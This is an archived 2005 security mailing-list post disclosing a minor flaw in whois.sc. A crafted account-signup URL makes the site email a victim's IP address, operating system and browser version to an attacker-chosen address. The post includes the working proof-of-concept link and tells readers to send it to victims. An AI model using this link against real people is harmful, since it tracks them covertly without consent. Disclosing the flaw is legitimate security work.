[<prev] [next>] [day] [month] [year] [list]
Message-ID: <b7a807650511030130p6b9e9aa5r3c3f78ecca49d8cd@mail.gmail.com>
Date: Thu Nov 3 11:09:38 2005
From: unknown.pentester at gmail.com (unknown unknown)
Subject: whois.sc not-big-deal hole (2nd post)
I just forgot to mention in the previous post that after the victim
clicks on the specially-crafted link, the attacker should be able to
receive an account sign-up email with the following information about
the victim (located at the bottom of the email body):
- IP Address
- Operating system version
- Web browser version
The bottom of the email looks like this (some information has been hidden):
---------------------------------------------------
NOTE: You received this message because someone from
X.X.X.X(Mozilla/X.X (Windows; U; Windows NT X.X; en-US; rv:X.X.X)
Gecko/2005XXXX Firefox/X.X.X)
requested an account for this email address. If you
did not request this account please ignore this message
and you will not be contacted again.
---------------------------------------------------
PoC:
http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40gmail.com
Replace "attacker%40gmail.com" in the previous link with your own
email address (e.g.: myself%40gmail.com) and send it to the victim.
Note: the only limitation of this "trick" is that the attacker needs
to use a different email address for each attack. This is because
whois.sc will set the account activation status to "pending" after
requesting the account activation for the first time.
Regards,
pagvac
Powered by blists - more mailing lists